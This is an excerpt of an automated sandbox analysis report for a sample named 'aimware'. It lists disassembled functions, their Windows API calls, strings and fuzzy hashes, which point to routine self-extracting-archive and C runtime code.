Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 5a091d56ccacefb40509c984d60a7e7f111bf21aaa07150c00f7da0b36e30569
Instruction ID: 093fea1c9536fcf1f035dbcab84870c26dcdf9abfc8dd19522c0dc60d0304d22
Opcode Fuzzy Hash: 5a091d56ccacefb40509c984d60a7e7f111bf21aaa07150c00f7da0b36e30569
Instruction Fuzzy Hash: C5F0F43610060166C75277647D4AA1F3A6A9FE2F30F200126F517973D2EE20C8029661

Function 00ACDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00ACDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ACDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ACDC72
TranslateMessage.USER32(?), ref: 00ACDC7C
DispatchMessageW.USER32(?), ref: 00ACDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00ACDC91

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: d2693788aeddbad96b9c5ba3a877a9143250a36e1208842a5211c4dc5098b22d
Instruction ID: 7fcddd889d71921c69243a9bf563cfd15e238f87bb2ef7d6256c81b70b713ecf
Opcode Fuzzy Hash: d2693788aeddbad96b9c5ba3a877a9143250a36e1208842a5211c4dc5098b22d
Instruction Fuzzy Hash: F2F04472A01219BBCF20ABA5EC4CEDF7FBDEF45751B008021F50AE2050EA74C646C7A0

Function 00ABC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00AC05DA: _wcslen.LIBCMT ref: 00AC05E0

Part of subcall function 00ABB92D: _wcsrchr.LIBVCRUNTIME ref: 00ABB944

_wcslen.LIBCMT ref: 00ABC197
_wcslen.LIBCMT ref: 00ABC1DF

Strings

.exe, xrefs: 00ABC10B
.rar, xrefs: 00ABC0E1, 00ABC134
.sfx, xrefs: 00ABC11A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: ecbeaf1e03fd416957ace7b90714dd54b23ae5ea2ad2b49406d9d25f41105208
Instruction ID: 87569f1cc5d39a392bbab66a4cc75b314842a3275e4212084ea18e364bf66288
Opcode Fuzzy Hash: ecbeaf1e03fd416957ace7b90714dd54b23ae5ea2ad2b49406d9d25f41105208
Instruction Fuzzy Hash: 8E411522540391E6CB31BF789956EFA73ACEF41764F104A0EF992AB183EB504D81C3A1

Function 00ACCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00ACCE9D

Part of subcall function 00ABB690: _wcslen.LIBCMT ref: 00ABB696

_swprintf.LIBCMT ref: 00ACCED1

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

SetDlgItemTextW.USER32(?,00000066,00AF946A), ref: 00ACCEF1
EndDialog.USER32(?,00000001), ref: 00ACCFFE

Strings

%s%s%u, xrefs: 00ACCEC6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: f51cbba2eec0e5378568c90abf6a071916e333ba3cf22597678c054361055d4c
Instruction ID: 24cff74d2d5d24671f4d35f0648247018d67d2083e74859c15f3f01ebe7afb6d
Opcode Fuzzy Hash: f51cbba2eec0e5378568c90abf6a071916e333ba3cf22597678c054361055d4c
Instruction Fuzzy Hash: B14180B1800258AADF21DB90CC45FEA77BCEB14315F4180AAFA09EB141EF709A45CF61

Function 00ABBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00ABBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00ABA275,?,?,00000800,?,00ABA23A,?,00AB755C), ref: 00ABBBC5
_wcslen.LIBCMT ref: 00ABBC3B

Strings

UNC, xrefs: 00ABBBA7
\\?\, xrefs: 00ABBB52, 00ABBB99, 00ABBBF7, 00ABBC4E

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 3c37c95f2de22d0bbd1bd912a6d1987fb533d362ff64da07497a0fcad984be52
Instruction ID: a6a55063b4b7ee9537d8b47e5bc8becbb29c24792a0bf9c3be2352bdef7c651a
Opcode Fuzzy Hash: 3c37c95f2de22d0bbd1bd912a6d1987fb533d362ff64da07497a0fcad984be52
Instruction Fuzzy Hash: CA41B432410259BACF21EF60CD41EEA7BADAF4A390F108465F955A7153EBF0DE90CA70

Function 00ACB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00ACB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00ACB712
DeleteObject.GDI32(00000000), ref: 00ACB744
DeleteObject.GDI32(00000000), ref: 00ACB767

Part of subcall function 00ACA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00ACB73D,00000066), ref: 00ACA6D5
Part of subcall function 00ACA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00ACB73D,00000066), ref: 00ACA6EC
Part of subcall function 00ACA6C2: LoadResource.KERNEL32(00000000,?,?,?,00ACB73D,00000066), ref: 00ACA703
Part of subcall function 00ACA6C2: LockResource.KERNEL32(00000000,?,?,?,00ACB73D,00000066), ref: 00ACA712
Part of subcall function 00ACA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00ACB73D,00000066), ref: 00ACA72D
Part of subcall function 00ACA6C2: GlobalLock.KERNEL32(00000000), ref: 00ACA73E
Part of subcall function 00ACA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00ACA762
Part of subcall function 00ACA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00ACA7A7
Part of subcall function 00ACA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00ACA7C6
Part of subcall function 00ACA6C2: GlobalFree.KERNEL32(00000000), ref: 00ACA7CD

Strings

], xrefs: 00ACB71A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 738395c7ea0cba1bf6aa0ea72a45313f6d0ef67a764bf2206be605a96430e56f
Instruction ID: be6f6a02b50831f58d00b9cae625ab04012598786c94b0f417cb4e599c56c59d
Opcode Fuzzy Hash: 738395c7ea0cba1bf6aa0ea72a45313f6d0ef67a764bf2206be605a96430e56f
Instruction Fuzzy Hash: F801C036601209A7C71277749D0AFBF7AB99BC5B5AF0A0019FD00B7291EF228D0546B2

Function 00ACD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00AB1316: GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
Part of subcall function 00AB1316: SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

EndDialog.USER32(?,00000001), ref: 00ACD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00ACD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00ACD675
SetDlgItemTextW.USER32(?,00000068), ref: 00ACD684

Strings

RENAMEDLG, xrefs: 00ACD618

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: fd3ac97734d7532d95662ee58a76bde361b9c915a114ffdb92a6a49c3410faa9
Instruction ID: b4dcc979a2ad2fec2a5d2ffe53fc88f008c44735e1197f4d55c62e9d86ccfe7c
Opcode Fuzzy Hash: fd3ac97734d7532d95662ee58a76bde361b9c915a114ffdb92a6a49c3410faa9
Instruction Fuzzy Hash: 8701F533254314BAE2208F649D09FAA7BEDEB5AB01F024428F305B3091DBA29904C765

Function 00AD7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AD7E24,00000000,?,00AD7DC4,00000000,00AEC300,0000000C,00AD7F1B,00000000,00000002), ref: 00AD7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AD7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00AD7E24,00000000,?,00AD7DC4,00000000,00AEC300,0000000C,00AD7F1B,00000000,00000002), ref: 00AD7EC9

Strings

mscoree.dll, xrefs: 00AD7E8C
CorExitProcess, xrefs: 00AD7E9E

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d6f282b4552634dca7006e23539ab9e02870fc73c468230d4c2037a226d7527d
Instruction ID: ff0e1102b4bac111d852cd9b834689438a9a5c8e63766c8a2860006e340bff2c
Opcode Fuzzy Hash: d6f282b4552634dca7006e23539ab9e02870fc73c468230d4c2037a226d7527d
Instruction Fuzzy Hash: E7F03131900248BBDB15DBA1DC49BAEBFB5EB44751F0040A9E805A6250DB709E41CB90

Function 00ABF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00AC0836
Part of subcall function 00AC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00ABF2D8,Crypt32.dll,00000000,00ABF35C,?,?,00ABF33E,?,?,?), ref: 00AC0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00ABF2E4
GetProcAddress.KERNEL32(00AF81C8,CryptUnprotectMemory), ref: 00ABF2F4

Strings

CryptUnprotectMemory, xrefs: 00ABF2EA
Crypt32.dll, xrefs: 00ABF2CE
CryptProtectMemory, xrefs: 00ABF2DE

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 2e0e3f6e2eb42d3f17a14a571c7c76b08d6411aa5ad538e1b8d8010883b72f9d
Instruction ID: fc9f4e31e298df96fcd48c94bf4f10262164e0079e9314815bfcc4b3fb1dff48
Opcode Fuzzy Hash: 2e0e3f6e2eb42d3f17a14a571c7c76b08d6411aa5ad538e1b8d8010883b72f9d
Instruction Fuzzy Hash: 30E0DF32800781AECF209B75984CB417AD86F04700B04886DE0DA93240C6B1D5808B40

Function 00AD2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00AD2CA1
___AdjustPointer.LIBCMT ref: 00AD2CC4
_abort.LIBCMT ref: 00AD2D12
___AdjustPointer.LIBCMT ref: 00AD2D60

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 8b0c3ef67f0d52c02ec168f28dcf7f83e94cd272df964f67110d9a3c6deca0ec
Instruction ID: 848f5d744e1f4bf96547e72ca9cae4c553d50cc1ffd17cd3d3971fba1bbc94b0
Opcode Fuzzy Hash: 8b0c3ef67f0d52c02ec168f28dcf7f83e94cd272df964f67110d9a3c6deca0ec
Instruction Fuzzy Hash: 2C51F172600212AFDB298F14DA45BAAB7A6FF64310F24452FED43473A1E732ED81D790

Function 00ADBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00ADBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ADBF5C

Part of subcall function 00AD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00ADCA2C,00000000,?,00AD6CBE,?,00000008,?,00AD91E0,?,?,?), ref: 00AD8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00ADBF82
_free.LIBCMT ref: 00ADBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ADBFA4

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 95e20035a6aab95825b3457939e35c4ade7da9962341be27adc68a77fef0b04a
Instruction ID: 8b729fec670b786e59d54acc23e6aeeaac5f708e83b5881ddab0b6d505435c87
Opcode Fuzzy Hash: 95e20035a6aab95825b3457939e35c4ade7da9962341be27adc68a77fef0b04a
Instruction Fuzzy Hash: 51019E72621211BF2B2157A65C8DC7F7A7DDACABA0316022AB906C7340EF60CD0286B0

Function 00AD9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00AD91AD,00ADB188,?,00AD9813,00000001,00000364,?,00AD3F73,00000050,?,00AF1030,00000200), ref: 00AD986E
_free.LIBCMT ref: 00AD98A3
_free.LIBCMT ref: 00AD98CA
SetLastError.KERNEL32(00000000,?,00AF1030,00000200), ref: 00AD98D7
SetLastError.KERNEL32(00000000,?,00AF1030,00000200), ref: 00AD98E0

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 01855324627beb3f53a5338b26da478d701d0988881755293d4bd8d5ca652394
Instruction ID: dd6b61450583e3070a14197a09749612a18c4b89147ef130208733d57905279f
Opcode Fuzzy Hash: 01855324627beb3f53a5338b26da478d701d0988881755293d4bd8d5ca652394
Instruction Fuzzy Hash: FD01F4362446016BC712A7A4ADC995F36AADFD2F707210137F51797392FE30CD02A661

Function 00AC0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00AC11CF: ResetEvent.KERNEL32(?), ref: 00AC11E1
Part of subcall function 00AC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00AC11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00AC0F21
CloseHandle.KERNEL32(?,?), ref: 00AC0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00AC0F54
CloseHandle.KERNEL32(?), ref: 00AC0F60
CloseHandle.KERNEL32(?), ref: 00AC0F6C

Part of subcall function 00AC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00AC1206,?), ref: 00AC0FEA
Part of subcall function 00AC0FE4: GetLastError.KERNEL32(?), ref: 00AC0FF6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 738c8a5843bba8c325b4f5b8de02aaa02b09b196f7a61136d2a980455c038cb6
Instruction ID: 32b239211ca8fff76b481d25e2de36ca9597e4d8ee794266929cb9214354d6fb
Opcode Fuzzy Hash: 738c8a5843bba8c325b4f5b8de02aaa02b09b196f7a61136d2a980455c038cb6
Instruction Fuzzy Hash: BA015272100784EFCB22DBA5DD88FD6BBA9FB08710F00096DF26A52160CB757A45CB90

Function 00ADC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00ADC817

Part of subcall function 00AD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?), ref: 00AD8DE2
Part of subcall function 00AD8DCC: GetLastError.KERNEL32(?,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?,?), ref: 00AD8DF4

_free.LIBCMT ref: 00ADC829
_free.LIBCMT ref: 00ADC83B
_free.LIBCMT ref: 00ADC84D
_free.LIBCMT ref: 00ADC85F

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e0d07723a04c1087abc01d1c7f5851a8b6f20c1d3017de9237be769156befde1
Instruction ID: 3fb046c1982c36905a6c50bb6fef9f3d6f52b490c4d902f400151ef20358da48
Opcode Fuzzy Hash: e0d07723a04c1087abc01d1c7f5851a8b6f20c1d3017de9237be769156befde1
Instruction Fuzzy Hash: 8AF01232504241BBC620DBA8E5C5C1A73EAAA54B247941C1BF14ADB792CB74FC80DB54

Function 00AC1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC1FE5
_wcslen.LIBCMT ref: 00AC1FF6
_wcslen.LIBCMT ref: 00AC2006
_wcslen.LIBCMT ref: 00AC2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00ABB371,?,?,00000000,?,?,?), ref: 00AC202F

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: bb15036115899bcf3b3918c6a279db4cd4aa245fe45ad721e20180ff05770f33
Instruction ID: c4ae10021f17b9f9c2bf64a6a75d854aa9ac9ec47bf55577c7c908786011d314
Opcode Fuzzy Hash: bb15036115899bcf3b3918c6a279db4cd4aa245fe45ad721e20180ff05770f33
Instruction Fuzzy Hash: 3FF01D33008014BBCF225F51EC49ECA7F66EB44760B11841AF61B5B1A2CF729A61D791

Function 00AD8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD891E

